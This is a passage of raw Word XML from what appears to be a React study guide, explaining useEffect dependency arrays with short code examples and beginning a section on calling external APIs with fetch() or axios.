          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Correctly using the dependency array ensures that your effects behave as expected, avoiding unnecessary re-renders or missing updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F310AA3" w14:textId="1B69D7D8" w:rsidR="00955143" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00955143">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="5596F60B">
          <v:rect id="_x0000_i3576" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B86F985" w14:textId="0E4B1582" w:rsidR="002B263A" w:rsidRPr="00CE4B95" w:rsidRDefault="004A258C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="880" w:name="_Toc196308360"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use and significance of dependency arrays</w:t>
      </w:r>
      <w:r w:rsidR="002B263A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="880"/>
    </w:p>
    <w:p w14:paraId="71EDFF9F" w14:textId="633D5736" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dependency array</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in useEffect plays a crucial role in controlling when an effect should be executed in a React component. Its use and significance revolve around optimizing performance, ensuring that the effect runs only when necessary, and managing side effects correctly in relation to state and props.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52746D86" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Uses and Significance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A83C5"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Optimizing Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>The dependency array allows you to control how often your side effects (like API calls, timers, or data updates) are triggered. Instead of running the effect after every render (which can be costly in terms of performance), the dependency array ensures that the effect only runs when specific values change. This reduces unnecessary computations and re-renders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBE1174" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Without a dependency array</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The effect will run on every render, which might be inefficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB076C4" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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With a dependency array</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The effect will only run when a specific value in the array changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC91F10"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Ensuring Correct Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">React’s useEffect hook can be used for various side effects like fetching data, manipulating the DOM, or subscribing to external services. The dependency array ensures that side effects happen </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only when they’re relevant</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B964D5"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For example, if you’re fetching data from an API based on the value of a prop or state, you want the effect to run only when that prop or state changes. The dependency array ensures this behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305E05D0"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const [count, setCount] = useState(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2211CC83" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FDF902A"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useEffect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAA552D"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console.log(`Count changed: ${count}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479288D9"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 Perform some side effect based on count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98BD14"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count]);  // Runs only when 'count' changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9A96B7"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Avoiding Stale Closures</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>JavaScript closures can sometimes lead to stale or outdated values being used inside your effect. The dependency array ensures that any variables used in the effect are always fresh and up-to-date, avoiding bugs that might arise from accessing stale state or props.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9493EA"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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FB6302"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const [count, setCount] = useState(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1205E3" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D78BE37"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useEffect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C261B45"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const timer = setInterval(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF1175B"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console.log(count); // This might use an outdated 'count' value without proper dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2819F07A"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 1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062B39D0" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43558A99"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return () =&gt; clearInterval(timer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B2E59A"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count]);  // Ensures 'count' is updated and the correct value is used in the interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411F0C81"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Controlling Effect Frequency</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2F763F" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Empty dependency array []</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The effect runs only </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>once</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> after the initial render, similar to componentDidMount in class components. This is useful for operations that should happen only once, like setting up subscriptions, or fetching data when the component mounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8305E" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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lastRenderedPageBreak/>
        <w:t>Array with dependencies [dep1, dep2, ...]</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The effect runs when </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>any value in the array changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, making it ideal for handling side effects that depend on specific state or props.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C46C0E" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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No dependency array</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The effect will run </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>after every render</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which can lead to excessive side effects and performance issues, but might be necessary for some cases like directly manipulating the DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147209C3"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Conditional Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">The dependency array allows for </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>conditional execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of effects. By specifying certain dependencies, you can decide when to trigger side effects based on changes to specific values. This makes your component more efficient and predictable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED4BEA"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useEffect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B863430"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if (isLoggedIn) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568CE9BB"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 Fetch user data only when user is logged in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EF9208"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fetchUserData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC23AB6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3953310F"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isLoggedIn]);  // Runs only when 'isLoggedIn' changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478DD73A"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Simplifying Code and Preventing Unintended Side Effects</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>The dependency array helps you avoid writing complicated logic to handle side effects based on certain conditions. React automatically manages the execution of the effect based on the values in the dependency array. This reduces the need for custom logic and makes the code more declarative and easier to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2786B08D" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary of Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752FDAF3"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Efficient Side Effects</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Run side effects only when necessary (based on dependencies).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EF924A"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Optimized Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevent unnecessary re-renders or API calls by triggering effects only when specific dependencies change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCBFE05"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Avoid Stale Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure the effect always uses fresh state and props.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DCD730"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Predictable Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Helps in controlling when and why the effect runs, making the app's behavior more predictable and manageable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B383051" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A27223"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Include all variables (props, state, functions) used inside useEffect that are defined outside of it in the dependency array to avoid stale closures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140172F9"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If you want the effect to run only once, use an empty array [].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A46E29"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If you don't need to track dependencies, avoid omitting the dependency array altogether, as it can lead to unnecessary re-renders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771ED009" w14:textId="0B232318" w:rsidR="00955143" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00955143">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="19988496">
          <v:rect id="_x0000_i3577" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E239192" w14:textId="304AB434" w:rsidR="002B263A" w:rsidRPr="00CE4B95" w:rsidRDefault="00D57367">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="881" w:name="_Toc196308361"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to make a call to an external API from ReactJS</w:t>
      </w:r>
      <w:r w:rsidR="002B263A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="881"/>
    </w:p>
    <w:p w14:paraId="6846B6BD" w14:textId="5E000DE6" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To make a call to an external API from ReactJS, you can use various methods, but the most common and efficient approach is to use fetch() or libraries like axios. Below, I'll explain both methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDD5D9A" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Using fetch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765CE131"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The fetch() API is built into modern browsers and provides a simple way to make network requests. It returns a Promise and is used for making HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64380591" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
